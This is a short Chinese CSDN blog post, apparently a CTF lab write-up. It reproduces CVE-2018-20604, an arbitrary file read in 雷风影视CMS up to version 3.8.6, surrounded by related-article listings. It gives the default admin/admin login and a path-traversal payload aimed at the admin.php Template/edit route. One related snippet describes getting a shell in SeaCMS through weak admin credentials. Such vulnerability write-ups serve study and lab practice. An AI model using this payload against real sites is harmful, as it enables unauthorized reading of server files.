雷风影视CMS任意文件读取漏洞(CVE-2018-20604)

最新推荐文章于 2024-10-09 13:38:31 发布
最新推荐文章于 2024-10-09 13:38:31 发布
阅读量215 收藏
点赞数 1
分类专栏: # 文件读取 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140662612
版权

一、漏洞概述

雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,该CMS存在缺陷,可以通过 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt 的方式读取任意文件。

二、影响范围

雷风影视CMS<= 3.8.6

三、访问页面

四、漏洞复现

1、登录后台,账号密码admin/admin

2、访问payload

/admin.php?s=/Template/edit/path/*web*..*..*..*..*..*..*flag

风中追风-fzzf
关注
专栏目录
雷风影视CMS v3.8.6
10-10
总的来说,【雷风影视CMS v3.8.6】是一款功能齐全、易于扩展的视频内容管理平台,结合THINKPHP框架的优势,为影视网站的建设和运营提供了强大的技术支持。无论是新手还是经验丰富的开发者,都能找到合适的工具和方法...
[春秋云镜]CVE-2018-20604
niubi707的博客
12-02 5363
春秋云镜CVE-2018-20604雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,该CMS存在缺陷,可以通过 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt 的方式读取任意文件
春秋云镜 CVE-2018-20604
qq_22002773的博客
09-01 219
春秋云镜 CVE-2018-20604
春秋云境CVE-2018-20604
2303_76653367的博客
05-22 455
雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,该CMS存在缺陷,可以通过 admin.php?s=/Template/edit/path/*web*..*..*..*..*1.txt 的方式读取任意文件
雷风cms 漏洞
weixin_34153893的博客
05-30 181
雷风cms默认是有一个bbs的, bbs根目录下默认是有一个upload.php 源码如下: 01 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "upload/2011/5/201105291829080676.gif) repeat-x;} 14 </style&gt...
SeaCMS海洋影视管理系统远程代码执行漏洞复现
holyxp的博客
07-27 880
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
雷风影视CMS v3.4.0
11-26
雷风影视CMS v3.4.0】是一款基于PHP编程语言,并采用了THINKPHP框架构建的高效能、用户友好的影视内容管理系统。这个系统专为建立各类视频和影视类网站设计,旨在让美工人员能够迅速搭建起具有专业外观和功能的...
雷风影视CMS v3.8.9
10-09
综合这些信息,我们可以了解到"雷风影视CMS v3.8.9"是一个强大而灵活的视频内容管理平台,结合了THINKPHP的高效开发能力和丰富的功能模块,适用于快速构建和管理影视类网站。用户可以根据自身需求进行二次开发,以...
雷风影视CMS v3.2
11-27
综上所述,【雷风影视CMS v3.2】是一个全面的影视内容管理解决方案,具备良好的开发基础和实用性,能够帮助用户快速构建起专业且个性化的视频网站。对于开发者而言,它提供了足够的灵活性和扩展空间,以适应不断变化...
雷风影视CMS源代码
03-18
LFCMS是一款采用PHP开发,基于THINKPHP框架开发适合各类视频、影视网站的影视内容管理。程序具有良好的用户体验,适合美工人员快速建立站点,您也可以根据您的需要进行应用扩展来达到更加强大功能。 您可以在遵循...
影视内容管理程序,适合各类视频、影视网站的影视内容管理程序,具有良好的用户体验,适合美工人员快速建立站点
06-07
雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序,具有良好的用户体验,适合美工人员快速建立站点,您也可以根据您的需要进行应用扩展来达到更加强大功能,您可以在遵循协议的情况下完全免费的使用我们的程序。
雷风影视php安装,雷风影视CMS v3.9.1
weixin_33281940的博客
03-10 489
雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发,适合各类视频、影视网站的影视内容管理程序。具有良好的用户体验,适合美工人员快速建立站点,您也可以根据您的需要进行应用扩展来达到更加强大功能。 您可以在遵循 协议 的情况下完全免费的使用我们的程序。雷风影视CMS v3.9.1 更新日志1.优化部分代码2.修改vip提示跳转v3.8.9更新日志:1.修复后台广告管理错误2.增加影片...
基于CVE-2018-20250的漏洞漏洞分析与APT-C-27(黄金鼠)攻击文档分析
kernweak的博客
04-25 1133
样本概况 样本信息 文件名: 3a6cc90db63a6d09721886b6e3f795e32f355d42e8faef560349ec068a9435f1.rar Size: 185528 bytes Modified: 2020年4月24日, 12:27:20 MD5: 314E8105F28530EB0BF54891B9B3FF69 SHA1: 8C9B88EE829B880...
网络安全概述:从认知到实践
l1x1n0的博客
10-04 930
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 930
信息安全工程师——机房安全分析与防护篇
Ping32引领数据防泄漏新潮流:智能、高效、安全
最新发布
2201_75471311的博客
10-09 314
Ping32凭借其智能、高效、安全的特点,为企业数据防泄漏提供了全面的解决方案。面对日益严峻的数据安全形势,企业需积极采取先进技术,提升数据保护能力,Ping32无疑是值得信赖的合作伙伴。
MySQL 安全
学习,分享一直在路上
10-06 993
MySQL安全实践
叉车毫米波雷达防撞技术,保护叉车作业安全
jiuxin666的博客
10-09 297
叉车毫米波防撞系统利用毫米波雷达技术实时监测环境,预警并紧急制动防碰撞,适用于狭窄通道,保护驾驶员及财产安全,实现叉车作业安全高效。
雷风影视CMS 3.3.4版本发布,优化用户体验
资源摘要信息: "雷风影视CMS 3.3.4.zip_recentlyvi1_slept5ef_影视_雷风cms_雷风影视CMS 3.3.4" 雷风影视CMS是一种专注于影视内容管理的网站内容管理系统(CMS),其版本号为3.3.4。CMS是一种用于组织和方便网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值